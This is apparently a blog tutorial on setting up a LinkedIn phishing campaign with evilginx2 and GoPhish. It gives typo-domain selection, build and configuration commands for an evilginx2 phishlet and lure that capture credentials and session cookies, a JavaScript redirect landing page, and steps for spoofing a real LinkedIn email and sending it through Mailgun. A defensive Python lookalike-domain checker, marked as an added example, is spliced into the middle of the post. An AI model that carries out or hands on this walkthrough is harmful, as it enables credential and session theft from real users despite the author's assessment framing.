8/3/2021 The Ultimate Guide to Phishing - computer insecurities

The Ultimate Guide to Phishing

Learn how to Phish using EvilGinx2 and GoPhish

Posted by Siddharth Balyan on August 03, 2021 · 15 mins read

Introduction
Why another Phishing guide?
Recently I’ve been able to get my hands dirty with Phishing and witness actual
Phishing campaigns thanks to the incredibly talented people at my workplace. To satisfy
my curiosity I tried to follow along with a small Phishing campaign against myself and
realized that there doesn’t seem to be an all-inclusive, all-in-one guide for beginners
to understand the process and help them set up the infrastructure.

So, this is my attempt at that.

I’m going to assume the starting point that you already know what phishing is, but
would like to learn how to do it.

Note: This is simply my way of contributing to the security community. Please don’t use
this knowledge for malicious purposes!

Breakdown
By my understanding, the process of phishing can be split into two parts:

The Phishing Website: This is the spoofed, fake website where the unknowing
user enters their credentials. From here we capture those credentials
along with their session cookies.
The Phishing Mail: This is the email sent to the victim in the
hope that they take the bait and go to our spoofed website.

The Phishing Website

Infrastructure and Tools Used
1. Urlcrazy: A tool for generating typo domains.
2. Freenom: For buying a free domain for testing/learning purposes.
3. evilginx2: A man-in-the-middle proxy for setting up the Phishing Website, which
can capture credentials.
4. Free Azure Account: Azure’s free standard VM for setting up all the
infrastructure and tools.

Getting a domain
A domain name needs to be convincing and similar enough to the domain of the
legitimate website. One can use urlcrazy or catphish to generate a list of typo
domains.

❯ urlcrazy linkedin.com

The marked domains are some examples of typo domains we can choose from; the rest
are all in use.

For demo purposes, I’m going to buy a free domain from Freenom. They offer free
domains under the .tk, .ml, .ga, .cf and .gq TLDs.

I’ll be buying linkdin.tk for now.

Note: Freenom is a bit buggy, so you may have to type the entire domain including the TLD
into their search box to be able to select it and put it in your cart.

We now have a Phishing domain to host our site on.
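The typo-domain step has a mirror image on the receiving side. Because evilginx2 proxies the genuine login page and relays the session (cookies included), what the victim sees after the click looks right; the hostname in the link is the most reliable thing to check before it. The following is an added example in Python, not code from this post, urlcrazy or evilginx2: it classifies every link in an HTML mail body as the real brand domain, a lookalike (typo, confusable characters, brand name under another TLD or as a subdomain) or unrelated. The BRANDS list, the homoglyph table and the sample mail are constructed for the example, and registrable_label assumes a single-label public suffix; a real deployment would use the Public Suffix List and its own brand list.

```python
"""Lookalike-domain check for links in inbound mail (added example, not from the post)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Brands we want to protect (constructed list for the example).
BRANDS = ["linkedin.com"]

# Visually confusable substitutions, multi-character entries first so "rn" wins over "n".
_HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize_homoglyphs(label: str) -> str:
    """Fold confusable character sequences into their ASCII look-alike."""
    for src, dst in _HOMOGLYPHS:
        label = label.replace(src, dst)
    return label


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(host: str) -> str:
    """Second-level label, e.g. 'linkdin' for 'www.linkdin.tk'.

    Simplification (assumption): a single-label public suffix. Suffixes such as
    co.uk need the Public Suffix List.
    """
    parts = host.split(".")
    return parts[-2] if len(parts) >= 2 else host


def classify_host(host: str, brands=BRANDS, max_distance: int = 2) -> str:
    """Return 'brand', 'lookalike' or 'unrelated' for a hostname."""
    host = host.lower().rstrip(".")
    labels = host.split(".")
    label = registrable_label(host)
    for brand in brands:
        if host == brand or host.endswith("." + brand):
            return "brand"
    for brand in brands:
        brand_label = registrable_label(brand)
        # Brand name reused under another TLD or as a subdomain:
        # linkedin.tk, linkedin.com.evil.example
        if brand_label in labels:
            return "lookalike"
        # Typo or confusable spelling of the brand label: linkdin.tk, 1inkedin.com
        if normalize_homoglyphs(label) == normalize_homoglyphs(brand_label):
            return "lookalike"
        if levenshtein(label, brand_label) <= max_distance:
            return "lookalike"
    return "unrelated"


def classify_url(url: str, brands=BRANDS) -> str:
    host = urlparse(url).hostname or ""
    return classify_host(host, brands)


class _HrefCollector(HTMLParser):
    """Collect href targets from an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def scan_mail_links(html: str, brands=BRANDS):
    """Return [(url, verdict), ...] for every link in an HTML mail body."""
    p = _HrefCollector()
    p.feed(html)
    p.close()
    return [(u, classify_url(u, brands)) for u in p.hrefs]


# Constructed sample: a "password changed" mail whose button points at the typo domain.
SAMPLE_MAIL = """
<p>Your LinkedIn password was changed.</p>
<a href="https://www.linkedin.com/help/">Help Center</a>
<a href="https://www.linkdin.tk/BMvzCciy">Review account activity</a>
"""

if __name__ == "__main__":
    for url, verdict in scan_mail_links(SAMPLE_MAIL):
        print(f"{verdict:10} {url}")
```

The edit-distance threshold of 2 is deliberately loose for an eight-letter label; against a long brand list it should be tuned per brand, and the verdict is a triage signal for a mail gateway or SOC playbook rather than a block decision on its own.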

Getting a Phishing Machine

To run evilginx2, the man-in-the-middle HTTP proxy, I am using an Azure B1S
Standard tier VM running Ubuntu 20.04 LTS, which I got free with my Azure for
Students subscription.

Once the VM is created, go ahead and open the ports 80, 443 and 3333 for HTTP,
HTTPS and GoPhish, which we will use later on, respectively.

Adding DNS Records

Go to the DNS Management page for your Freenom domain and add the A record for
www.

Configuring EvilGinx2
First install Go by following the instructions here and make sure you add it to your
$PATH.

Then, clone the repo for evilginx2, cd into the directory and make the binary.
Additionally, add the binary to /usr/bin or /usr/local/bin and copy the phishlets and
templates directories to /usr/share/evilginx so you can use the tool from any path.

❯ git clone https://github.com/kgretzky/evilginx2.git

❯ cd evilginx2

❯ make

❯ sudo cp bin/evilginx /usr/bin

❯ sudo cp -r phishlets/ /usr/share/evilginx/

❯ sudo cp -r templates /usr/share/evilginx/

Run evilginx2 and if the phishlets have been loaded successfully you should see the
tool run.

Now edit the config to add your domain, your IP and the redirect URL.

: config domain linkdin.tk

[01:25:52] [inf] server domain set to: linkdin.tk

: config ip 52.172.136.70

[01:25:59] [inf] server IP set to: 52.172.136.70

: config redirect_url https://xxxx.xxxx

[02:02:52] [inf] unauthorized request redirection URL set to: https://xxxx.xxxx

Any scanners that visit your domain without the lure parameter will automatically be
redirected to the redirect_url you set here.

We also need to set up a TLS certificate for our domain. Luckily, the tool can handle
that for us. Do the following:

: phishlets hostname linkedin linkdin.tk

: phishlets enable linkedin

Our LinkedIn phishlet is all set up!

Creating EvilGinx2 Lure


The next task is to create a lure, which would be the phishing URL to send the
victims to.

: lures create linkedin

[04:31:37] [inf] created lure with ID: 1

: lures get-url 1

https://www.linkdin.tk/BMvzCciy

We also need to add the URL the victim will get redirected to after logging in. This is
different from the config redirect_url as that one is for the scanners and unintended
users and this one is for the victims post-login.

: lures edit 1 redirect_url https://www.linkedin.com/

[04:46:06] [inf] redirect_url = 'https://www.linkedin.com/'

Once that’s done, navigate to the lure URL to make sure it’s working.

If you did everything right, you should see a LinkedIn login page!

Congratulations! You now have a Phishing Website set up!

Note: You can run evilginx2 in a tmux session so that when you quit your ssh
connection, the tool keeps on running.

The Phishing Mail

Infrastructure and Tools Used
1. GoPhish: The phishing framework used to manage users, email templates and
phishing campaigns.
2. Mailgun: The email service used to send the emails to the victims.

Installing GoPhish

GoPhish is an open-source phishing framework which makes it easy to configure, run
and track Phishing campaigns. Install it by either downloading the binary for your
system from here, or by building it for your system using:

❯ go get github.com/gophish/gophish

Then navigate to the directory of installation (usually
~/go/src/github.com/gophish/gophish) and run go build. You should have a binary
called gophish in your directory. In the same directory, there should be a file called
config.json. Here, change the listen_url from 127.0.0.1:3333 to 0.0.0.0:3333.

You can now run the binary;

sudo ./gophish

You should probably run gophish in the same tmux session as evilginx2.

The temporary credentials are printed in the logs here. Navigate to
https://[your-ip]:3333 and log in using these credentials.
You are now in the GoPhish Admin Panel.

Setting up an Email Template in GoPhish


We set up and configure the email which shall be received by the victim here. To
make a convincing email template, go through your own inbox and try to find an
existing email from the website you’re trying to spoof. For my use case, I will use a
Password-Reset Confirmation Email which I received from LinkedIn.

Click on the three-dot options button and Download the Email you want to use as a
template.

Open the file and copy its contents. Now navigate to the Email Templates tab and create a
new template. Here, click on Import Email and paste the copied contents.
Optionally, check the Change Links to Point to Landing Page checkbox. This will
change all the links in the mail to point to the spoofed landing page.

Now, in the HTML tab, modify the contents to your own liking.

Crafting a convincing email is very important, so if you’re doing this for an assessment,
take your time to craft a phishing email.

For reference, here’s my template;

Setting up the Landing Page in GoPhish

The landing page is what you want users to “land” on once they click on the link in
the email. Once in the GoPhish admin panel, navigate to Landing Pages and create a
new page. Give it a page name and, for the page content, add the following:

<html><head><script>
window.location.replace("<YOUR EVILGINX LURE URL>");
</script>
</head><body></body></html>

It should look similar to this;

The phishing server runs on http://[your-ip]:80. This is what the {{.URL}} template
variable expands to. Whenever the victim navigates to this page (through the link they
will be prompted to visit), they will be redirected to your evilginx2 lure.

Setting up a Sending Profile with GoPhish and Mailgun

Now that we have the phishing mail, the spoofed website and all the tools, all we
need to do is send the email. For this, we will use Mailgun’s free tier user account.
Make an account at Mailgun and navigate to the Sending tab. Here, in the SMTP
section, you’ll find your SMTP credentials.

Also add Authorized Recipients. As a free tier user, only authorized recipients can
receive emails from your Mailgun account.

Now, in the Sending Profile in the GoPhish panel, make a new profile and copy your
credentials and config here as follows.

Adding Users in GoPhish

You have to add the victims in the Users & Groups section. Navigate to the section,
and you’ll see you can either do it manually or in bulk using their CSV template.

For demo purposes, I’ll be sending the mail to myself, so I’ll add my user in manually.

Creating and Launching the Campaign

All your GoPhish setup is done! Now all you have to do is create a new campaign in
the Campaigns section, add all the config you’ve done and launch it!

Now, it is very likely that your email has been marked as a phish and has been moved
to the Spam folder. You can go to the link in the mail, and you’ll notice something like
this;

Click proceed and look! evilginx2 has started logging all the data of the new visitor
(you).

On entering the password, you can see evilginx2 capturing the credentials and
displaying them.

Running the sessions command will show you all the user credentials and cookies
you’ve captured, though this is out of our current scope.

Final Thoughts
Congrats! You’ve successfully understood how to run a phishing campaign, and that
too without shelling out a single rupee! There are a few caveats: the phishing
mail gets marked as a phishing mail, but that can be avoided by using a more
trustworthy domain and shelling out some cash for a premium Mailgun account.

Note that this is just the beginning of how you can conduct phishing assessments.
Once you proceed further, the complexity increases. Automation, spam evasion,
bypassing filters, aging your domains etc., come into play. To get a better insight into
some of these topics, you can check out @grahamhelton3’s course on Practical
Phishing Assessments here.

Be sure to reach out to me @siddharthdotexe for any fixes or queries!

Happy Hacking!

Copyright © Siddharth Balyan 2021
